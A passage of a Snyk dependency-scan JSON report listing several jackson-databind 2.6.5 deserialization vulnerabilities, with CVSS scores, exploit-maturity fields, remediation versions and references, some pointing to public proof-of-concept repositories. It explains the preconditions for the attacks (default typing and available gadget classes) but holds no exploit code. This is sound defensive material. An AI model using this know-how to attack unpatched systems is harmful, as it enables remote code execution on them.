"triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11.1)", - "[2.9.0,2.9.5)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1931", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:58.671582Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:49.486075Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.859910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:58.671582Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.486075Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", - "epssDetails": { - "percentile": "0.99133", - "probability": "0.93631", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-7489" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cggj-fvv3-cqwv" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-02-26T15:13:40.723000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11.1)", - "[2.9.0,2.9.5)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-02-10T15:13:40Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-02-26T15:13:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.486075Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.9.1", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2341", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/Al1ex/CVE-2019-12814", - "title": "PoC Repository" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:36.647712Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:50.077144Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:15.371549Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.647712Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:50.077144Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", - "epssDetails": { - "percentile": "0.87218", - "probability": "0.01539", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12814" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cmfg-87vq-g5g4" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-06-19T15:28:46.421239Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-06-19T14:34:16Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-06-19T14:34:16Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.077144Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "College of software Nankai University" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.9.9.1", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", - "title": "Debian Security Announcement" - }, - { - "url": "https://github.com/jas502n/CVE-2019-12384", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", - "title": "Github Fix" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2334", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Jackson CVEs Don't Panic - Blog" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", - "title": "Release Notes" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:36.645685Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:50.734463Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:45.683422Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.645685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:50.734463Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", - "epssDetails": { - "percentile": "0.97607", - "probability": "0.53288", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12384" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mph4-vhrx-mv67" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-06-25T10:06:54.889582Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-05-28T10:27:59Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-06-25T10:26:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.734463Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.9.2", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2387", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2389", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2395", - "title": "GitHub Issue" - }, - { - "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", - "title": "Snyk Blog" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:45.849047Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:54.502907Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.033731Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:45.849047Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.502907Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", - "epssDetails": { - "percentile": "0.83638", - "probability": "0.00984", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14379" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6fpp-rgj9-8rwc", - "GHSA-gwp4-hfv6-p7hw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-07-29T14:55:33.030000Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-07-29T12:40:42Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-07-29T12:40:42Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.502907Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.pr2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": 